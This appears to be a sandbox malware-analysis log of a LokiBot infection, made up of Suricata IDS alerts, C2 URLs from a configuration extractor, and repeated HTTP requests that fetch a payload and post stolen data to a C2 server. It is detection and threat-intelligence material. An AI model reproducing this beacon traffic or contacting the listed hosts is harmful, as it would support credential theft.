                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49813 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49942 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49998 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50063
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50003
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49813 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49942 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49813 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49998 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49900 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50044
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49900 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49900 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49998
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49956
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49900 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49900 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49841
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49942 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49942 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49813 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49745
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49942
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49813 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49900
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49813
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49949 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49949 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49949 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49752
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49949 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49949 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49949
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50080 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50080 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50080 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50080 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50080 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50080
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49932 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50039
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49932 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49932 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49932 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49932 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49932
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50049
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50068 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50068 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50068 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50068 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50068 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50068
                Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.243.136:80 -> 192.168.2.4:49738
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.95/simple/five/fre.php
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/LOGLK.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
